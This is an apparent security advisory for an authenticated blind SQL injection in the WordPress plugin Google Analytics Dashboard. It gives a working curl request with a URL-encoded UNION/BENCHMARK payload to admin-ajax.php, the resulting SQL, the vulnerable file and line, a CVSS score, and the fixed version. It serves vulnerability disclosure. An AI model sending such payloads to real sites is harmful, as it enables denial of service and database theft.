Blind SQL injection in Google Analytics Dashboard could cause denial of service or expose database


Last revised:

Google Analytics Dashboard contains an ajax handler with an sql statement that is vulnerable to SQL injection. The attacker would have to be logged in in order for this vulnerability to be exploited.

The statement does not cause any data to be sent back to the browser, but an appropriately crafted request could be used to cause a denial of service.

The following request:

curl -i -b $WORDPRESS_SESSION_COOKIE 'http://wordpress.local/wp-admin/admin-ajax.php?action=gad_fill_ppp&pid=%34%36%20%75%6E%69%6F%6E%20%61%6C%6C%20%73%65%6C%65%63%74%20%62%65%6E%63%68%6D%61%72%6B%28%31%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%2C%6D%64%35%28%30%78%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%34%36%29%29'

Would cause this SQL statement to be run:

SELECT count(1) FROM wp_posts WHERE post_status = 'draft' AND ID = 46 union all select benchmark(1000000000000000000000,md5(0x4646464646464646464646464646464646));

Which would result in the MySQL server spending a very long time generating MD5 hashes, causing the server to stop responding to valid queries.

An attacker who knows or can work out the ID of a draft post could also extract arbitrary data from the database.

The vulnerable query is in gad-admin-pages-posts.php at line 79.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 7.9 High
Vector Network
Complexity Medium
Authentication Single
Confidentiality Complete
Integrity None
Availability Complete
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Advisory timeline

Mitigation/further actions

Version 2.0.5 has been released which addresses this problem; users running older versions should upgrade immediately.